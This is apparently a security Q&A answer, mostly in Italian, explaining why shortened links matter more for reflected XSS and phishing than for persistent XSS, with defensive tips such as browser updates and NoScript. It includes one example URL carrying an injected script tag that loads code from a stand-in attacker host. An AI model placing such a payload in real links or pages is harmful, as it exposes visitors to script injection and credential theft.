hope there is no one linking to a page with an advanced exploit kit or persistent xss vuln.
Il rischio con collegamenti abbreviati non è un XSS persistente, ma riflette XSS e phishing.
Supponiamo che stackexchange sia aperto a XSS persistente. Se pubblico un link a https://security.stackexchange.com/questions/414141/my-evil-question , crederesti che sia sicuro, visitalo e il mio codice JavaScript verrebbe eseguito. L'uso di abbreviazioni URL non aggiunge nulla al mio attacco (potrebbe persino renderti più sospettoso).
Se invece lo stackexchange è aperto a XSS riflesso, l'URL sarà simile a https://security.stackexchange.com/questions/414141/my-evil-question?someParam=<script src=evil.attacker/script.js></script> , e in tal caso abbreviare l'URL sarebbe utile per nascondere lo script inserito.
How can It-sec people trust other it-sec people?
Bene, non dovresti fidarti delle persone a caso in reddit/r/netsec, twitter, security.stackexchange .
E sì, gli ultimi aggiornamenti sono una buona idea (la maggior parte dei browser ha almeno un filtro per difendersi dagli XSS riflessi e alcuni filtri di phishing) e anche NoScript è buono.
Se vuoi sapere cosa c'è dietro un link abbreviato, controlla questa domanda su verifica dei link abbreviati .